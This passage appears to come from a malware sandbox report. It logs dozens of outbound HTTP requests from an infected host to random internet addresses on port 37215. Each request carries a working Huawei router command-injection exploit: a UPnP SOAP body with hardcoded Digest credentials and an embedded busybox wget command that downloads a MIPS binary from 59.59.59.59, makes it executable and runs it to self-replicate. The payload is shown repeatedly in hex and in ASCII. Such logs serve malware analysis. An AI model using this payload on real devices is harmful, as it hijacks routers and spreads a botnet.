2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          789192.168.2.1558560197.23.71.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669810057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          790192.168.2.1544012197.216.208.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669832945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          791192.168.2.1546388157.235.190.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669859886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          792192.168.2.154283841.124.4.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669886112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          793192.168.2.1550468197.13.214.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669917107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          794192.168.2.1540098197.9.99.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669938087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          795192.168.2.155263041.4.185.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670269012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          796192.168.2.156064812.246.243.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670293093 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          797192.168.2.1536664197.158.17.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670340061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          798192.168.2.1554604197.177.51.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670378923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          799192.168.2.153618841.56.197.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670380116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
